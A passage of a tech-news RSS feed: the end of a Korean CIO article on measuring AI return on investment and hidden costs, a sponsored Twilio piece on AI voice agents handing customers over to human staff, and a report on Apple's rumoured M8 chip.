<p>프로젝트는 기존 프로세스의 여러 문제점도 찾아냈다. 일부 업무는 직원 재교육이 필요했고, 어떤 경우에는 사용자 인터페이스(UI)를 개선해야 했다. 하지만 일단 프로세스를 표준화하면 AI 도입 이전의 기준 데이터를 확보할 수 있다. 이를 기반으로 AI를 활용한 업무 지원이나 자동화가 실제 성과를 냈는지 객관적으로 비교·평가할 수 있다.</p>



<p>또 하나 미리 결정해야 했던 과제는 AI로 확보한 시간을 어떻게 활용할 것인지였다.</p>



<p>보바는 “사람을 감원하는 것은 바람직하지 않다”라며 “이들은 고도의 전문성을 갖춘 구하기 어려운 인재인 만큼, 팀 간 인력을 재배치하는 방안을 고려하는 편이 더 적절하다”라고 밝혔다.</p>



<p>현재 노보 노디스크는 수백 개의 AI 에이전트를 실제 업무에 운영하고 있다. 이들 에이전트는 모두 디지털 트윈 인프라 안에서 식별할 수 있도록 관리된다.</p>



<p>보바는 “문제가 발생하면 어디에서 오류가 생겼는지 정확히 파악해 바로 수정할 수 있다”라며 “다음 단계는 여러 AI 에이전트가 서로 협업하는 멀티 에이전트 오케스트레이션이다. 지금은 각각의 AI 에이전트가 연결돼 있지만, AI 에이전트를 관리하는 또 다른 AI 에이전트는 아직 없는 상태”라고 설명했다.</p>



<p>다만 신약 개발은 수년에 걸쳐 진행되는 만큼 아직 AI 투자 수익률(ROI)을 평가하기에는 이르다는 것이 보바의 설명이다.</p>



<p>보바는 “전체 프로세스를 종단간(end-to-end)으로 분석하면 불필요한 과정을 제거해 개발 기간을 2년 정도 단축할 수 있을 것으로 기대한다”라며 “현재보다 2년 더 빨리 시장에 제품을 출시하는 것이 목표”라고 말했다.</p>



<p>이미 임상 개발 막바지에 접어든 신약은 AI 도입에 따른 시간 단축 효과가 제한적이다. 반면 개발 초기 단계의 신약은 가장 큰 혜택을 받을 것으로 예상된다. 다만 이러한 성과가 기업의 재무 실적으로 이어지기까지는 앞으로 수년이 더 걸릴 전망이다.</p>



<p>이처럼 여러 프로세스를 동시에 최적화해야 진정한 가치를 얻을 수 있는 산업은 제약업계만이 아니다. <a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html" target="_blank" rel="nofollow">PwC에 따르면</a> 단발성 AI 프로젝트는 측정 가능한 성과를 내지 못하는 경우가 많다. 반면 기업의 경영 전략과 연계된 전사적 규모의 AI 도입은 실질적인 투자 수익을 창출하는 것으로 나타났다.</p>



<p>실제로 AI 도입이 거의 보편화됐음에도 불구하고 지난 12개월 동안 AI를 통해 매출이 증가하거나 비용이 감소했다고 답한 기업은 많지 않았다. 그럼에도 KPMG는 올해 말 기업의 AI 투자 규모가 지난해보다 거의 두 배로 증가할 것으로 <a href="https://kpmg.com/us/en/media/news/q1-ai-pulse2026.html" target="_blank" rel="nofollow">전망했다</a>.</p>



<h2 class="wp-block-heading">생산성 측정</h2>



<p>대부분의 기업은 비교적 작은 규모에서 AI 도입을 시작한다. 대표적인 사례가 직원 생산성 향상을 위한 AI 챗봇 도입이다. AI 챗봇은 놀라울 정도로 빠른 속도로 확산됐지만, 정작 기대했던 생산성 향상을 어떻게 측정해야 하는지는 여전히 쉽지 않은 과제로 남아 있다.</p>



<p>카네기멜런대학교 AI 교수 아난드 라오(Anand Rao)는 무엇보다 기준선(baseline)을 확보하는 것이 중요하다고 말한다. 하지만 어떤 업무는 기준선을 측정하기가 어렵고, 어떤 경우에는 사실상 불가능하다.</p>



<p>예를 들어 보험 심사는 결과가 나타나기까지 수년이 걸린다. 생명보험이라면 그 기간이 수십 년에 이를 수도 있다. 일부 의사결정은 애초에 성과를 측정할 기준 자체가 존재하지 않는다.</p>



<p>라오는 “사람의 의사결정 과정과 그 질을 평가하겠다고 하면 사회적 거부감이 생긴다”라며 “사람은 자신의 의사결정이 평가받는 것을 좋아하지 않는다”라고 설명했다.</p>



<p>이어 “결과가 좋으면 누구나 자신의 공이라고 말하지만, 결과가 나쁘면 외부 요인 때문이라고 생각하는 경향이 있다”라고 말했다.</p>



<p>측정이 가능한 업무라도 상황은 크게 다르지 않다. 많은 기업이 AI를 도입하기 전에 기존 성과를 측정하는 작업부터 하지 않는 경우가 많기 때문이다.</p>



<p>패션 소매업체 룰루레몬(Lululemon)의 전 글로벌 최고정보책임자(CIO)이자 수석부사장(EVP)을 지낸 줄리 애버릴(Julie Averill)은 “처음부터 기준선을 마련하지 않았다”라고 말했다. 현재 애버릴은 디지털 혁신 컨설팅 기업 골드 스레드(Gold Thread)의 CEO를 맡고 있다.</p>



<p>애버릴은 “AI가 더 나은 의사결정을 도와줄 것이라는 전제를 먼저 세우고 시작했다”라며 “그렇게 되면 이후 성과를 제대로 측정하기가 어려워진다”라고 설명했다.</p>



<p>물론 다른 지표를 활용할 수도 있다. 예를 들어 AI 사용률이나 사용자 만족도 같은 수치다.</p>



<p>애버릴은 “AI는 실제로 활용되고 있고 다양한 이점을 만들어내고 있다”라며 “눈에 보이는 효과도 있지만 그렇지 않은 효과도 있다. 결국 프로세스를 믿어야 한다”라고 말했다.</p>



<p>이어 “이는 클라우드 도입과 비슷하다. 모두가 미래의 방향이라는 사실은 알고 있고 장점도 이해하지만, 실제로 전환하기는 쉽지 않으며 조직 전반에 많은 변화가 필요하다”라며 “하지만 전환을 빨리 시작할수록 새로운 운영 방식에 더 빨리 적응하고 AI의 가치를 제대로 활용할 수 있다”라고 설명했다.</p>



<p>반면 고객 서비스처럼 성과를 수치로 측정하기 쉬운 영역도 있다.</p>



<p>애버릴은 “고객 서비스는 반복적인 업무가 많아 기업이 AI 자동화를 가장 먼저 적용하는 분야”라며 “측정 가능한 결과가 분명하고 기준선도 비교적 쉽게 설정할 수 있다”라고 말했다.</p>



<p>룰루레몬은 개인화 추천 시스템에도 수년간 AI를 활용해 왔다. 이 역시 성과를 정량적으로 측정할 수 있는 분야다. 또한 AI는 수작업 데이터 입력을 자동화해 오류율을 낮출 수 있으며, 규정 준수 모니터링과 사기 탐지, 설비 예지보전(Predictive Maintenance) 등에서도 활용되고 있다. 이러한 분야는 모두 AI 효과를 수치로 평가할 수 있다.</p>



<p>하지만 직원 생산성 전반을 측정하는 일은 룰루레몬뿐 아니라 대부분의 기업에 여전히 어려운 과제다.</p>



<p>가장 직관적인 방법은 AI의 영향을 많이 받는 직종에서 실제 해고가 늘어났는지를 살펴보는 것이다. AI 때문에 일자리가 줄어든다는 보도는 이미 넘쳐난다.</p>



<p>그러나 올해 3월 공개된 <a href="https://www.anthropic.com/research/labor-market-impacts" target="_blank" rel="nofollow">앤트로픽 보고서</a>는 다른 결과를 제시했다. AI의 영향을 가장 크게 받는 직종, 즉 AI로 인해 해고 가능성이 가장 높은 직군에서도 실업 증가를 보여주는 증거는 발견되지 않았다.</p>



<p>2025년 초에는 연구기관 METR이 숙련된 소프트웨어 개발자를 대상으로 AI 사용 여부에 따른 업무 수행 속도를 비교하는 실험을 진행했다.</p>



<p>결과는 예상과 달랐다. 개발자들은 AI를 사용하면 생산성이 24% 정도 향상될 것으로 기대했고, 실제 체감 효과도 약 20%라고 평가했다. 하지만 실측 데이터는 정반대였다. AI를 사용한 경우 오히려 작업 속도가 평균 19% 느려진 것으로 나타났다.</p>



<p>물론 AI 도구는 빠르게 발전하고 있다. METR은 AI 사용 여부를 다시 비교하는 후속 연구를 추진했지만 충분한 참가자를 모집하지 못했다. 연구 참여 비용을 지급했음에도 AI 없이 작업하는 방식으로 돌아가려는 개발자가 거의 없었기 때문이다.</p>



<p>물론 AI 덕분에 한 명의 엔지니어가 수백 명의 업무를 수행했다는 사례도 심심치 않게 들린다. 클로드 코드의 50만 줄 규모 코드베이스가 실수로 유출됐을 당시 한국인 개발자 시그리드 진(Sigrid Jin)이 클린룸 방식(원본 코드를 직접 복사하거나 참고하지 않고, 동일한 기능을 새롭게 구현하는 개발 방식)으로 이를 2시간 만에 재구현한 뒤 <a href="https://github.com/ultraworkers/claw-code" target="_blank" rel="nofollow">깃허브에 공개</a>했고, 해당 프로젝트가 역대 가장 빠르게 별 10만 개를 달성했다는 사례도 있다.</p>



<p>하지만 AI와 관련된 대부분의 이야기처럼 실제 상황은 훨씬 복잡하다. 특히 소프트웨어 개발에서는 코드를 작성하는 일 자체가 전체 개발 과정에서 차지하는 비중은 일부에 불과하다.</p>



<p>리서치 기관 DX가 400개 기업의 핵심 엔지니어링 지표를 분석한 <a href="https://getdx.com/blog/ai-productivity-gains-are-10-percent-not-10x/" target="_blank" rel="nofollow">보고서에 따르면</a> AI 활용률은 2024년 11월 이후 65% 증가했다. 그러나 AI로 인한 생산성 향상은 10%에도 미치지 못한 것으로 나타났다.</p>



<h2 class="wp-block-heading">AI의 숨은 비용</h2>



<p>AI의 생산성 향상을 측정하기 어려운 것처럼 AI 도입 비용을 정확하게 산정하는 일도 쉽지 않다. 기업이 AI를 처음 도입할 때는 비용을 비교적 간단하게 계산할 수 있다. 직원들이 사용하는 AI 챗봇의 월 구독료는 얼마인지, 맞춤형 모델을 학습하거나 파인튜닝하는 데 얼마나 드는지만 계산하면 되기 때문이다. 하지만 활용 사례가 복잡해질수록 비용 산정도 훨씬 어려워진다고 애버릴은 설명했다.</p>



<p>애버릴은 “이제는 AI 자체뿐 아니라 AI를 둘러싼 다양한 시스템까지 고려해야 한다”라며 “이런 비용은 측정하기는 더 어렵지만 기업에 미치는 영향은 훨씬 크다”라고 말했다.</p>



<p>예를 들어 RAG을 활용해 AI를 업무 프로세스에 통합하면 LLM API 호출 비용이 지속적으로 발생한다. 여기에 기존 시스템을 연동하거나 수정하는 비용까지 추가된다. 이러한 비용 구조는 시간이 갈수록 더욱 복잡해지고 있다.</p>



<p>KPMG의 글로벌 AI·데이터 랩 총괄인 스와미나탄 찬드라세카란(Swaminathan Chandrasekaran)은 “기업들은 지금까지 AI 사용 현황을 체계적으로 수집·분석할 수 있는 텔레메트리와 계측 체계를 구축하는 데 충분한 노력을 기울이지 않았다”라고 말했다. 기업 전체의 AI 비용을 정확히 파악하는 일은 마치 날씨를 예측하는 것과 비슷하다는 설명이다.</p>



<p>그는 “오늘날 정확한 기상 예보가 가능한 이유는 수만 개의 기상관측소가 데이터를 수집하고 이를 종합하기 때문”이라며 “그런 데이터가 없다면 날씨를 예측할 수 없을 것”이라고 설명했다.</p>



<p>기업도 AI 활용 전반을 측정할 수 있는 계측 체계를 구축해야 한다는 것이 그의 주장이다. 얼마나 많은 토큰을 사용했는지, 누가 사용했는지, 그리고 그 사용량이 실제 업무 성과와 어떤 관계가 있는지까지 추적해야 한다는 것이다.</p>



<p>찬드라세카란은 “현재는 이러한 측정 체계가 근본적으로 부족한 상황”이라고 지적했다.</p>



<p>직원이 AI 챗봇을 사용하는 경우에는 그나마 비용을 예측하기 쉽다. 사람이 하루에 입력할 수 있는 질문 수에는 물리적인 한계가 있고 구독료도 비교적 일정하기 때문이다. 또한 RAG를 적용한 업무 시스템에서는 기존의 규칙 기반 시스템이 예측 가능한 방식으로 LLM API를 호출한다.</p>



<p>하지만 에이전틱 AI가 등장하면서 상황은 훨씬 복잡해졌다. AI 에이전트는 예측하기 어려운 방식으로 자율적으로 행동하기 때문에 API 호출 횟수가 급격히 늘어날 수 있다. <a href="https://www.bcg.com/publications/2026/how-leaders-build-an-ai-first-cost-advantage" rel="nofollow">보스턴컨설팅그룹(BCG) 보고서</a>에 따르면 기업의 약 3분의 2는 AI 확장에 따른 비용이 통제하기 어려운 수준으로 증가하고 있다고 답했다.</p>



<p>기업이 간과하기 쉬운 또 다른 비용은 데이터 관련 비용이다. 다른 예산 항목에 포함돼 있다는 이유로 제대로 추적하지 않는 경우도 많다. AI 학습이나 파인튜닝을 위한 데이터 준비, RAG 임베딩 구축, AI 에이전트를 통한 MCP 직접 연동 등은 모두 상당한 비용을 수반하며, AI 도입이 확대될수록 이러한 비용은 빠르게 증가할 수 있다.</p>



<p>컨설팅 업체 코글린 어소시에이츠(Coughlin Associates)의 대표이자 IEEE 펠로인 톰 코글린(Tom Coughlin)은 “대표적인 비용 가운데 하나가 데이터 반출(egress) 비용”이라며 “클라우드에서 데이터를 꺼내와야 하는 경우 데이터 반출 수수료가 상당한 수준까지 늘어날 수 있다”라고 설명했다.</p>



<p>AI 도입에는 <a href="https://www.cio.com/article/4156938/it-%EB%B9%84%ED%9A%A8%EC%9C%A8-%EA%B8%B0%EC%97%85%EC%97%90-%EC%97%B0%EA%B0%84-%EC%88%98%EB%B0%B1%EB%A7%8C-%EB%8B%AC%EB%9F%AC-%EC%86%90%EC%8B%A4-%EC%B4%88%EB%9E%98%ED%95%B4%EB%B2%95%EC%9D%80.html" target="_blank">사람에 대한 투자 비용</a>도 적지 않다.</p>



<p>코글린은 “장기적으로 AI는 큰 가치를 제공하겠지만, 이를 제대로 활용하려면 직원들이 올바르게 사용하는 방법을 익혀야 한다”라며 “그러한 역량이 부족하면 결국 경쟁에서 뒤처질 수밖에 없다”라고 말했다.</p>



<h2 class="wp-block-heading">해결책과 상반된 현실</h2>



<p>AI 프로젝트에서는 문제를 해결하는 데도 적지 않은 비용이 든다. 지난 18개월 동안 대다수 기업이 최소 한 차례 이상의 AI 관련 사고를 경험했으며, 그중 상당수는 금전적 손실로 이어졌다. 일부 기업은 피해 규모가 50만 달러(약 7억 4,700만 원)를 넘기도 했다. 여기에 AI 기능이 거의 모든 소프트웨어와 서비스에 기본 탑재되면서 ROI를 계산하는 일은 더욱 복잡해지고 있다.</p>



<p>미국 로펌 브라운스타인 하얏트 패버 슈렉(Brownstein Hyatt Farber Schreck)의 최고정보책임자(CIO) 앤드루 존슨(Andrew Johnson)은 “직접적인 비용은 정확히 파악할 수 있다”라면서도 “기존에 사용하던 플랫폼이나 원래 AI 기능이 없던 SaaS 애플리케이션에 AI가 추가되는 경우에는 비용을 측정하기가 훨씬 어렵다”라고 말했다.</p>



<p>이어 “공급업체들은 AI 기능이 추가됐다며 라이선스 비용을 큰 폭으로 인상하고 있다”라며 “그 인상분 가운데 실제로 얼마나 AI 때문인지를 따져보면 명확하지 않은 경우가 많다”라고 설명했다.</p>



<p>AI가 비용 절감 효과를 가져오더라도 그에 따른 추가 비용이 발생하는 경우도 적지 않다. 예를 들어 브라운스타인은 계약 관리 플랫폼에 연간 약 7만 달러(약 1억 462만 원)를 지출하고 있었다. 이를 AI를 활용해 자체 구축하면서 약 4만 달러(약 5,980만 원)의 개발 인건비와 연간 3,000달러(약 448만 원)의 호스팅 비용이 들었다. 이후 유지보수 비용도 연간 수천 달러 수준으로 발생할 예정이다.</p>



<p>여기에 자체 애플리케이션을 운영하면 보안 감사와 취약점 평가, 침투 테스트, 코드 리뷰 등 간접 비용도 함께 고려해야 한다.</p>



<p>존슨은 “플랫폼이 복잡하고 위험도가 높을수록 자체 솔루션을 개발하려는 의지는 그만큼 줄어든다”라고 말했다.</p>



<p>그럼에도 AI 덕분에 소프트웨어 개발 조직의 생산성은 크게 향상됐다. 현재 개발자 4~5명이 과거 20~30명이 수행하던 업무를 처리할 수 있게 됐다.</p>



<p>하지만 생산성 향상이 곧바로 인건비 절감으로 이어지는 것은 아니다. 해결해야 할 새로운 프로젝트가 계속 생겨나기 때문이다.</p>



<p>존슨은 “개발해야 할 솔루션 아이디어가 엄청나게 많이 쌓여 있다”라고 말했다.</p>



<p>카네기멜런대학교의 라오 교수는 업무는 가용한 시간을 모두 채우는 방향으로 늘어나는 경향이 있다고 설명했다.</p>



<p>예를 들어 AI 덕분에 생산성이 20% 향상됐다고 가정해 보자. 라오는 “100명이 하던 일을 이제는 80명이 할 수 있게 됐다고 생각할 수 있다”라며 “하지만 연말이 돼도 실제 인원은 그대로인 경우가 많다”라고 말했다.</p>



<p>이어 “기존 업무는 분명 더 효율적으로 처리된다”라며 “하지만 사람은 확보한 20%의 여유 시간을 활용해 새로운 업무를 추가하거나 기존 업무를 보완한다. 한 시간 일찍 퇴근하는 것이 아니라 새로운 가치를 만드는 일에 시간을 쓰게 된다”라고 설명했다.</p>



<p>오히려 일부 업종에서는 생산성 향상이 단기적으로 수익성을 악화시킬 수도 있다. 대표적인 사례가 시간당 수임료를 청구하는 법률 서비스다.</p>



<p>존슨은 “효율성 향상은 지금까지 법률업계가 수익을 창출해 온 방식과 상충하는 측면이 있다”라며 “하지만 장기적인 관점에서 생각해야 한다. 단기적으로는 어려움이 있지만 장기적으로는 결코 불리한 일이 아니다. 오히려 AI를 도입하지 않으면 중장기적으로 경쟁력을 잃을 가능성이 크다”라고 말했다.</p>



<p>예를 들어 AI가 변호사의 실사(due diligence) 업무를 지원한다고 해서 해당 AI 도구에 투자한 비용이 곧바로 매출 증가로 이어진다고 단정하기는 어렵다.</p>



<p>존슨은 “AI 도입이 장기적으로 올바른 방향이라는 점은 분명하다”라며 “다만 그것이 구체적으로 어느 정도의 투자 수익으로 이어질지는 아직 단정하기 어렵다”라고 말했다.<br>dl-ciokorea@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI voice agents and the human touch: A new playbook for SME customer engagement]]></title>
<description><![CDATA[Customer expectations don’t end when business hours do, which is why delivering a fast, always-on customer experience (CX) has traditionally required large call centres and significant resources. This often placed small businesses at a disadvantage, as many lacked the manpower and budget to provi...]]></description>
<link>https://tsecurity.de/de/3664586/it-nachrichten/ai-voice-agents-and-the-human-touch-a-new-playbook-for-sme-customer-engagement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664586/it-nachrichten/ai-voice-agents-and-the-human-touch-a-new-playbook-for-sme-customer-engagement/</guid>
<pubDate>Mon, 13 Jul 2026 10:03:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Customer expectations don’t end when business hours do, which is why delivering a fast, always-on customer experience (CX) has traditionally required large call centres and significant resources. This often placed small businesses at a disadvantage, as many lacked the manpower and budget to provide 24/7 support at scale. Today, AI has completely levelled the playing field. Even small businesses now have access to powerful tools that can answer queries, resolve routine issues, and deliver highly personalised interactions around the clock.</p>



<p>But adopting AI in customer engagement is not just a question of efficiency. For smaller businesses especially, where loyalty is often built on familiarity, trust, and personal service, the real challenge is using AI in ways that strengthen rather than dilute the human connection that customers value most.</p>



<p>Human empathy combined with AI efficiency is a delicate blend. Done right, it ensures that every customer interaction feels personal, thoughtful, and seamless, whether the customer is engaging with a bot at 2 a.m. or a live agent during office hours.</p>



<p>So, how can small businesses embrace always-on virtual agents without losing the human connection that defines their identity? Here’s a practical playbook to guide the transition.</p>



<h2 class="wp-block-heading">1. Understand what customers want: Speed, simplicity, and empathy</h2>



<p>Before diving into AI adoption, it’s critical to understand what customers expect. Twilio’s <a href="https://www.twilio.com/en-us/lp/digital-patience-apj?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub_digital-patience" rel="sponsored"><em>Di</em></a><em><a href="https://www.twilio.com/en-us/lp/digital-patience-apj?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub_digital-patience" target="_blank" rel="sponsored">g</a></em><a href="https://www.twilio.com/en-us/lp/digital-patience-apj?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub_digital-patience" rel="sponsored"><em>ital Patience</em></a> study suggests that while speed matters, it is not the only thing that customers value. Twilio found that 46% of respondents in the Asia-Pacific and Japan region say quick service and resolution are most important, but 51% say delays are acceptable if they lead to better customer support. The study also notes that customers are open to AI, but still value human touchpoints more highly.</p>



<p>The takeaway: AI should enhance CX, not replace it. Businesses can let natural-sounding AI voice agents handle inbound calls, regardless of peak hours or time zones. These virtual agents act as an intelligent frontline – answering common questions and qualifying leads – before seamlessly routing the conversation to a live human representative. The result? Callers get immediate answers, and the business captures every opportunity without losing the human touch.</p>



<h2 class="wp-block-heading">2. Map the handover points between AI and humans</h2>



<p>One of the most common pitfalls in implementing AI is failing to clearly define when and how customers transition from bots to human agents. To avoid customer frustration, organisations must thoughtfully map out these “handover points” by designing for two key principles: choice and continuity.</p>



<h3 class="wp-block-heading"><strong><em>Designing for Choice</em></strong></h3>



<p>Give customers the option to reach a human when needed. While AI is perfectly suited for routine inquiries like FAQs or order tracking, customers should never feel trapped in a bot loop. Always provide a clear, accessible option for them to choose to escalate the issue. Additionally, configure your system to proactively step in and offer a human handoff the moment it detects emotion, ambiguity, or complex steps.</p>



<h3 class="wp-block-heading"><strong><em>Designing for Continuity</em></strong></h3>



<p>Effective handovers rely on technology that recognises when an issue exceeds AI’s scope. By leveraging natural language processing and intelligent routing, organisations can ensure the transition from machine to human is frictionless. Crucially, this means automatically carrying the full history and context of the interaction forward so the customer never needs to repeat themselves.</p>



<p>Achieving this level of continuity requires a new approach to managing interaction data during handovers. Instead of passing along a raw transcript, organisations need a managed memory service that provides agents with persistent context across every conversation, channel, and session. By transforming customer preferences, unresolved issues, and intent into a structured semantic profile—one that continuously evolves and reconciles new interactions as they occur—agents can quickly understand the relationship and continue the interaction without disruption.</p>



<p>To support truly omnichannel experiences, the system must also resolve identity automatically across touchpoints, linking interactions from phone, email, messaging apps, and other channels to a single customer profile. Equally important is the ability to surface only the information that is relevant to the task at hand. By presenting agents with a concise summary of the active issue and customer preferences, grounded in verified business knowledge such as product policies and FAQs, organisations can reduce resolution times while ensuring customers experience a seamless continuation of the conversation.</p>



<h2 class="wp-block-heading">3. Don’t automate for automation’s sake</h2>



<p>AI adoption should never feel like a “set it and forget it” strategy. Instead, it should be approached as a way to solve real business problems. It starts with asking questions like: What are the most time-consuming tasks for the team? What frustrates customers the most?</p>



<p>For instance, a restaurant might automate table reservations and menu queries, while a small online retailer could deploy AI to handle order status updates or product recommendations. These targeted use cases ensure that AI adds tangible value without overwhelming operations.</p>



<p>Take the example of <a href="https://customers.twilio.com/en-us/driva?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub" target="_blank" rel="sponsored">Driva</a>, a fast-growing online finance broker that deployed AI-powered customer service tools to answer routine enquiries and provide immediate assistance while customers wait in the call queue. By automating common interactions, Driva reduced the volume of requests requiring human intervention and achieved a 5% uplift in conversion rates at key points in the customer journey.</p>



<h2 class="wp-block-heading">4. Invest in AI that connects</h2>



<p>While consumers embrace automation, <a href="https://www.twilio.com/en-us/lp/digital-patience-apj?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub_research" target="_blank" rel="sponsored">research</a> shows they still draw comfort from the warmth of a human voice. To make your virtual agents feel less robotic and more like an extension of your team, look for tools that:</p>



<ul class="wp-block-list">
<li>Deliver human-like voice AI experiences at scale through natural turn-taking and barge-in capabilities.</li>



<li>Connect interactions across voice, messaging, and digital channels into a single thread so every exchange builds on the last.</li>



<li>Leverage Natural Language Processing (NLP) that enables conversational systems to interpret context, mimic human tone, and even recognise sentiment.</li>



<li>Place orchestration at the heart of the experience. An effective orchestration engine acts as the “conductor,” actively coordinating workflows and routing interactions so the right resource—whether an AI bot or a human—handles the right moment.</li>
</ul>



<p>When AI bots, automated workflows, and human teams are seamlessly coordinated behind the scenes, the customer simply experiences one unbroken, dynamic dialogue. For small enterprises, this means delivering sophisticated experiences that effortlessly bridge the gap between automation and live support, even at scale.</p>



<h2 class="wp-block-heading">5. Empower teams with real-time context</h2>



<p>AI is not about replacing human workers; it’s here to make jobs easier. However, for teams to fully embrace this new dynamic, organisations must shift their focus from retrospective performance reviews to real-time agent assistance. By feeding agents context as the conversation happens, businesses ensure that every interaction never starts from scratch.</p>



<ul class="wp-block-list">
<li><strong>Leveraging Conversational Intelligence: </strong>Use a real-time intelligence layer that turns live conversations into signals and actions. By analysing voice and messaging with generative AI Language Operators, businesses can understand intent, sentiment, and churn risk instantly, allowing human and AI agents to act in the moment with the right response or escalation.</li>



<li><strong>In-the-Moment Guidance:</strong> Give agents instant context and in-the-moment guidance during every interaction. Surfacing relevant customer history, next-best action suggestions, and summaries in real time allows agents to resolve issues faster without switching tools.</li>



<li><strong>Resolving Complex Customer Needs:</strong> AI can handle routine enquiries with low latency, but human agents still excel at nuanced problem-solving. With AI feeding them persistent customer memory and sentiment analysis in real time, human agents can skip the repetitive questions and immediately focus on resolving complex issues, rescuing deals, or preventing churn.</li>
</ul>



<p>When employees are equipped with real-time customer data and voice-driven insights, SMEs empower their teams to stop reacting to problems and start responding to customers proactively.</p>



<p>Consider global AI platform <a href="https://customers.twilio.com/en-us/genspark?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub" target="_blank" rel="sponsored">Genspark</a>, which leverages a Programmable Voice API for its “Call for Me” agent to handle complex outbound tasks like checking supplier pricing or booking international hotels. The AI can conduct real-time, natural conversations across different languages on the user’s behalf, seamlessly navigating the live interactions before delivering a structured summary. Because these natural voice experiences depend entirely on speed and consistency, the underlying infrastructure provides the critical sub-second latency necessary to keep every automated call clear and uninterrupted.</p>



<h2 class="wp-block-heading">6. Maintain transparency with customers</h2>



<p>Finally, a successful AI implementation requires transparency. Customers should always know when they’re communicating with a bot and when they’ve been handed over to a human. AI-powered interactions must offer clarity by providing transparency about when and how AI is used and explaining next steps in plain language.</p>



<p>Transparency builds trust. Small businesses can go a step further by soliciting customer feedback on their AI interactions and using this input to fine-tune their systems.</p>



<p>For small enterprises, the AI-to-human handover isn’t about choosing between humans and machines; it’s about combining the strengths of both to create exceptional customer experiences. AI can provide the speed and efficiency customers expect, while humans deliver the empathy and creativity they value.</p>



<p>By strategically defining handover points, investing in human-like AI, and empowering agents to work alongside technology, organisations can build a CX strategy that’s as scalable as it is personal.</p>



<p>This blended approach ensures that every interaction – whether managed by a bot or a human – is thoughtful, natural, and distinctly on-brand.  </p>



<p>To learn more about Twilio, visit <a href="https://www.twilio.com/en-us/why-twilio?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_end-cta-ai-voice-agent_brandposthub" target="_blank" rel="sponsored">here</a>.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Is Already Building The M8 Chip For Supreme AI Power]]></title>
<description><![CDATA[Apple is moving at breakneck speed to stay ahead in the tech race, and it is already looking far past its upcoming processors. According to Mark Gurman in his latest Power On newsletter for Bloomberg, the tech giant is currently designing the massive M8 chip. The new silicon will focus heavily on...]]></description>
<link>https://tsecurity.de/de/3664275/ios-mac-os/apple-is-already-building-the-m8-chip-for-supreme-ai-power/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664275/ios-mac-os/apple-is-already-building-the-m8-chip-for-supreme-ai-power/</guid>
<pubDate>Mon, 13 Jul 2026 07:24:06 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple is moving at breakneck speed to stay ahead in the tech race, and it is already looking far past its upcoming processors. According to Mark Gurman in his latest Power On newsletter for Bloomberg, the tech giant is currently designing the massive M8 chip. The new silicon will focus heavily on artificial intelligence performance and extreme power savings for future computers and tablets.



The company jumps to a smaller 1.4nm technology for better efficiency



Reports show that the company is planning to build the M8 using an incredibly small 1.4-nanometer manufacturing process. The change will allow it to pack way more power into a tiny space while draining less battery life. This massive leap in efficiency is expected to arrive by 2028 when TSMC starts producing the new wafers. The new 1.4nm tech will not just be for computers, as the future iPhone models in 2028 will likely use it for the A22 Pro chip too.



The current roadmap shows that the brand is moving aggressively. We already know that Apple finalizes M7 chip design in record time to push AI limits because it wants to speed up hardware releases. This rapid pace also means that mid-tier chips are being skipped. For instance, Apple's M6 Pro and M6 Max may never launch as the company funnels all its resources into getting the next generations ready faster.



Future chips focus heavily on running massive smart tasks locally



Mark Gurman notes that the main reason for this rushed timeline is artificial intelligence. The upcoming processors are being designed from the ground up to handle intense local workloads. While the M7 will bring a huge memory upgrade, the M8 will take things to a completely different level with even greater capabilities. The company is reportedly working on a specific M8 processor codenamed Soko for 2028.



This huge push for memory and raw performance is clear across all product lines. For context, Apple's M7 Ultra could support up to 1.5TB of unified memory, which is double the capacity planned for the older M5 version.



By forcing its silicon team into overdrive, the tech giant is making sure its future machines will effortlessly run complex tasks without breaking a sweat. When these new processors finally arrive, buyers should see a massive jump in everyday speed and battery life.]]></content:encoded>
</item>
<item>
<title><![CDATA[Secret Apple Car Research Reportedly Powered The New M7 And M8 Chips]]></title>
<description><![CDATA[For a long time, many people thought the cancelled car project was a huge waste of money and time for the giant tech company. However, it turns out that the decade of hard work is exactly what gave it the massive power boost needed for its newest computer parts.



The heavy artificial intelligen...]]></description>
<link>https://tsecurity.de/de/3664242/ios-mac-os/secret-apple-car-research-reportedly-powered-the-new-m7-and-m8-chips/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664242/ios-mac-os/secret-apple-car-research-reportedly-powered-the-new-m7-and-m8-chips/</guid>
